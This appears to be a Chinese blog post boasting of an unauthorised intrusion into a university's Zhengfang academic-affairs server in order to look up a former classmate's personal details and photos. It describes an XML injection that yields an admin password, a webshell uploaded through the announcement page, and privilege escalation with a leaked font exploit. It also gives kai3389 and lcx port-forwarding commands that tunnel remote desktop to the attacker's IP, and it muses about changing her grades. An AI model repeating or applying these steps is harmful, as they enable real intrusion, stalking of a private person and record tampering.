转眼又到高考,这一年来每晚梦到她,一晚不落。不说了,先换条内裤去、、、

我叫她猫,她叫我猪。我喊她妹妹,然后她会说:“我是猫,你是猪,咱俩有关系吗?”
我喜欢下课去洗脸,每次回来,她都会说:“呀,你怎么又一脸口水啊!”
她把兔子耳朵戴到我头上,然后狂笑。
她说,我有白头发的,然后我把手伸到她头发中狂翻……
只和我打我必输的赌,赌注是冰激凌。
然后,结束了。

说的有点远,现在可以回归主题了,在同学口中问道,她现在在XXX师范大学。提高女神、必然要搞掉教务处啊,电话照片要什么有什么!

正方教务漏洞

学校官网:Xxx.net, 目标(教务处):xxx.xxx.net

正方教务系统,记得在sss看到一篇关于正方漏洞(正方教务系统post型xml注入)的文章,直接开搞拿到jwc01密码,过程不细说。

哈哈,权限齐全,查信息不在话下,女神来了,上图!

正方教务漏洞服务器渗透寻找我逝去的青春-开水网络

正方教务getshell

这就结束了吗?当然不可能,后台都进了,不getshell哪是我的作风呢!

在教务公告发布看到一处上传,各种折腾各种限制,我的宝贝马儿被截了一大半,后来查了一下资料,咱还有ashx的马呢,

正方教务漏洞服务器渗透寻找我逝去的青春-开水网络

在教务公告发布那里直接上传ashx文件来取得webshell。(会在同目录下生成asp的马)上传的文件后保存到/wbwj/这个目录中去,上传生成的asp马儿到wbwj文件夹下,访问测试。妥妥的,当然这里直接上传ashx的马也是可以的。

正方教务漏洞服务器渗透寻找我逝去的青春-开水网络

内网渗透提取

这就结束了吗?当然不可能,shell都拿了,不提权哪是我的作风呢!

上传一个aspxspy,执行命令,果然并不能/add, systeminfo成功执行,安装321个补丁,这可如何是好?懒得一个个的不定去看了,把手上的exp使劲往上丢,并没有什么卵用。洗洗睡,抱着女神照片来一发!

怎么人心放下,想起前几天在别的阅马场捡到的Hacking Team的利用字体提前的神器还没有试试呢。(代码分析及漏洞看这里http://drops.wooyun.org/papers/6998

就是屌,账户添加成功,来个图。

正方教务漏洞服务器渗透寻找我逝去的青春-开水网络

多灾多难啊,3389没开,服务器在内网。一万匹草泥马奔腾,一个一个来吧。

上kai3389.exe成功执行,开3389端口。

上lcx.exe 端口转发链接,在本地执行 lcx.exe -listen 51 33891 在shell里执行lcx.exe -slave 你的IP 51 127.0.0.1 3389

正方教务漏洞服务器渗透寻找我逝去的青春-开水网络

艾玛,太卡,翻了半天找到成绩单,要不要给女神改改呢?

正方教务漏洞服务器渗透寻找我逝去的青春-开水网络

这就结束了吗?、、不然呢、约出来就不写了!